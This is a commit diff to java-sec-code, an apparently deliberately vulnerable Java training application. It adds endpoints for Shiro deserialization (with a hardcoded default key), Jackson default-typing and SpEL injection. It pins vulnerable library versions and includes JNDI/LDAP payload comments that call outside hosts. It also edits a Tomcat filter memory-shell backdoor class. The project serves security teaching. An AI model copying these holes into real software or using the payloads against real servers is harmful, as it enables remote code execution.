fix #78

Author: JoyChou

README.md

@@ -47,6 +47,7 @@ Sort by letter.
   - ScriptEngine
   - Yaml Deserialize  
   - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)

README_zh.md

@@ -42,6 +42,7 @@ joychou/joychou123
     - ScriptEngine
     - Yaml Deserialize
     - Groovy
+- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)

java-sec-code.iml

@@ -1,5 +1,11 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <module version="4">
+  <component name="AdditionalModuleElements">
+    <content url="file://$MODULE_DIR$" dumb="true">
+      <sourceFolder url="file://$MODULE_DIR$/spring-cloud-gateway-helloworld" isTestSource="false" />
+      <sourceFolder url="file://$MODULE_DIR$/src/main/test" isTestSource="true" />
+    </content>
+  </component>
   <component name="FacetManager">
     <facet type="Spring" name="Spring">
       <configuration />

pom.xml

@@ -12,7 +12,6 @@
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
         <maven.compiler.target>1.8</maven.compiler.target>
-        <tomcat.version>8.5.85</tomcat.version>
     </properties>
 
 
@@ -197,11 +196,12 @@
             <version>1.7</version>
         </dependency>
 
-        <!-- rce -->
+
         <dependency>
             <groupId>com.thoughtworks.xstream</groupId>
             <artifactId>xstream</artifactId>
-            <version>1.4.10</version>
+            <!-- For testing, you can use the vulnerable version of 1.4.10. -->
+            <version>1.4.20</version> <!-- use latest version to exploit vuln by using xstream.addPermission-->
         </dependency>
 
         <dependency>
@@ -344,6 +344,65 @@
             <version>11.5.8.0</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.apache.shiro</groupId>
+            <artifactId>shiro-core</artifactId>
+            <version>1.2.4</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-databind</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-annotations</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-core</artifactId>
+            <version>2.9.8</version>
+        </dependency>
+
+
+        <!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
+        <dependency>
+            <groupId>org.jsecurity</groupId>
+            <artifactId>jsecurity</artifactId>
+            <version>0.9.0</version>
+        </dependency>
+
+
+        <!-- 为了使用SimpleEvaluationContext，该类需要spring-expression版本大于等于4.3.15 -->
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-expression</artifactId>
+            <version>4.3.16.RELEASE</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
+        <dependency>
+            <groupId>com.h2database</groupId>
+            <artifactId>h2</artifactId>
+            <version>1.4.199</version>
+            <scope>test</scope>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-dbcp</artifactId>
+            <version>9.0.8</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>QLExpress</artifactId>
+            <version>3.3.1</version>
+        </dependency>
     </dependencies>
 
     <dependencyManagement>

src/main/java/org/joychou/Application.java

@@ -5,7 +5,6 @@
 import org.springframework.boot.builder.SpringApplicationBuilder;
 import org.springframework.boot.web.servlet.ServletComponentScan;
 import org.springframework.boot.web.support.SpringBootServletInitializer;
-import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
 @ServletComponentScan // do filter

src/main/java/org/joychou/config/TomcatFilterMemShell.java

@@ -1,10 +1,5 @@
 package org.joychou.config;
 
-import com.sun.org.apache.xalan.internal.xsltc.DOM;
-import com.sun.org.apache.xalan.internal.xsltc.TransletException;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
-import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
-import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 import java.lang.reflect.Field;
 import org.apache.catalina.core.StandardContext;
 import java.io.IOException;
@@ -19,8 +14,8 @@
 import javax.servlet.*;
 import java.util.*;
 
-@Component
-public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+//@Component
+public class TomcatFilterMemShell implements Filter {
     static{
         try {
             System.out.println("Tomcat filter backdoor class is loading...");
@@ -75,16 +70,6 @@ public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
     }
 
 
-    @Override
-    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
-
-    }
-
-    @Override
-    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
-
-    }
-
     @Override
     public void init(FilterConfig filterConfig) throws ServletException {
 

src/main/java/org/joychou/controller/Deserialize.java

@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
 import org.joychou.config.Constants;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
@@ -83,4 +84,17 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
         return "I'm very OK.";
     }
 
+    // String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
+    @RequestMapping("/jackson")
+    public void Jackson(String payload) {
+        ObjectMapper mapper = new ObjectMapper();
+        mapper.enableDefaultTyping();
+        try {
+            Object obj = mapper.readValue(payload, Object.class);
+            mapper.writeValueAsString(obj);
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+    }
+
 }

src/main/java/org/joychou/controller/FileUpload.java

@@ -195,4 +195,4 @@ private static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
         return bi != null;
     }
-}
+}

src/main/java/org/joychou/controller/Jsonp.java

@@ -6,8 +6,8 @@
 import com.alibaba.fastjson.JSONPObject;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang.StringUtils;
-import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.joychou.security.SecurityUtil;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
@@ -19,7 +19,6 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 

src/main/java/org/joychou/controller/Jwt.java

@@ -33,7 +33,9 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque
         String loginUser = request.getUserPrincipal().getName();
         log.info("Current login user is " + loginUser);
 
-        CookieUtils.deleteCookie(response, COOKIE_NAME);
+        if (!CookieUtils.deleteCookie(response, COOKIE_NAME)){
+            return String.format("%s cookie delete failed", COOKIE_NAME);
+        }
         String token = JwtUtils.generateTokenByJavaJwt(loginUser);
         Cookie cookie = new Cookie(COOKIE_NAME, token);
 

src/main/java/org/joychou/controller/Log4j.java

@@ -2,7 +2,7 @@
 
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
-import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
@@ -11,23 +11,18 @@ public class Log4j {
     private static final Logger logger = LogManager.getLogger("Log4j");
 
     /**
-     * http://localhost:8080/log4j?token=${jndi:ldap://wffsr5.dnslog.cn:9999}
+     * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75}
      * Default: error/fatal/off
      * Fix: Update log4j to lastet version.
-     * @param token token
      */
-    @GetMapping("/log4j")
+    @RequestMapping(value = "/log4j")
     public String log4j(String token) {
-        if(token.equals("java-sec-code")) {
-            return "java sec code";
-        } else {
-            logger.error(token);
-            return "error";
-        }
+        logger.error(token);
+        return token;
     }
 
     public static void main(String[] args) {
-        String poc = "${jndi:ldap://127.0.0.1:1389/f616nl}";
+        String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}";
         logger.error(poc);
     }
 

src/main/java/org/joychou/controller/Rce.java

@@ -15,7 +15,6 @@
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
-import java.sql.DriverManager;
 
 
 /**

src/main/java/org/joychou/controller/Shiro.java

@@ -0,0 +1,49 @@
+package org.joychou.controller;
+
+
+import lombok.extern.slf4j.Slf4j;
+import org.apache.shiro.crypto.AesCipherService;
+import org.joychou.config.Constants;
+import org.joychou.util.CookieUtils;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.*;
+import static org.springframework.web.util.WebUtils.getCookie;
+
+@Slf4j
+@RestController
+public class Shiro {
+
+    byte[] KEYS = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+    private final static String DELETE_ME = "deleteMe";
+    AesCipherService acs = new AesCipherService();
+
+
+    @GetMapping(value = "/shiro/deserialize")
+    public String shiro_deserialize(HttpServletRequest req, HttpServletResponse res) {
+        Cookie cookie = getCookie(req, Constants.REMEMBER_ME_COOKIE);
+        if (null == cookie) {
+            return "No rememberMe cookie. Right?";
+        }
+
+        try {
+            String rememberMe = cookie.getValue();
+            byte[] b64DecodeRememberMe = java.util.Base64.getDecoder().decode(rememberMe);
+            byte[] aesDecrypt = acs.decrypt(b64DecodeRememberMe, KEYS).getBytes();
+            ByteArrayInputStream bytes = new ByteArrayInputStream(aesDecrypt);
+            ObjectInputStream in = new ObjectInputStream(bytes);
+            in.readObject();
+            in.close();
+        } catch (Exception e){
+            if (CookieUtils.addCookie(res, "rememberMe", DELETE_ME)){
+                log.error(e.getMessage());
+                return "RememberMe cookie decrypt error. Set deleteMe cookie success.";
+            }
+        }
+
+        return "Shiro deserialize";
+    }
+}

src/main/java/org/joychou/controller/SpEL.java

@@ -1,38 +1,64 @@
 package org.joychou.controller;
 
+import org.springframework.expression.Expression;
 import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.common.TemplateParserContext;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
-import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.expression.spel.support.SimpleEvaluationContext;
+import org.springframework.expression.spel.support.StandardEvaluationContext;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 
 /**
- * SpEL Injection
- *
+ * SpEL Injection.
  * @author JoyChou @2019-01-17
  */
 @RestController
 public class SpEL {
 
     /**
-     * SpEL to RCE
-     * http://localhost:8080/spel/vul/?expression=xxx.
-     * xxx is urlencode(exp)
-     * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+     * Use Spel to execute cmd. <p>
+     * T(java.lang.Runtime).getRuntime().exec("open -a Calculator")
      */
-    @GetMapping("/spel/vuln")
-    public String rce(String expression) {
+    @RequestMapping("/spel/vuln1")
+    public String spel_vuln1(String value) {
         ExpressionParser parser = new SpelExpressionParser();
-        // fix method: SimpleEvaluationContext
-        return parser.parseExpression(expression).getValue().toString();
+        return parser.parseExpression(value).getValue().toString();
+    }
+
+    /**
+     * Use Spel to execute cmd. <p>
+     * #{T(java.lang.Runtime).getRuntime().exec('open -a Calculator')}
+     * Exploit must add <code>#{}</code> if using TemplateParserContext.
+     */
+    @RequestMapping("spel/vuln2")
+    public String spel_vuln2(String value) {
+        StandardEvaluationContext context = new StandardEvaluationContext();
+        SpelExpressionParser parser = new SpelExpressionParser();
+        Expression expression = parser.parseExpression(value, new TemplateParserContext());
+        Object x = expression.getValue(context);    // trigger vulnerability point
+        return x.toString();   // response
+    }
+
+    /**
+     * Use SimpleEvaluationContext to fix.
+     */
+    @RequestMapping("spel/sec")
+    public String spel_sec(String value) {
+        SimpleEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();
+        SpelExpressionParser parser = new SpelExpressionParser();
+        Expression expression = parser.parseExpression(value, new TemplateParserContext());
+        Object x = expression.getValue(context);
+        return x.toString();
     }
 
     public static void main(String[] args) {
         ExpressionParser parser = new SpelExpressionParser();
-        String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
+        String expression = "1+1";
         String result = parser.parseExpression(expression).getValue().toString();
         System.out.println(result);
     }
+
 }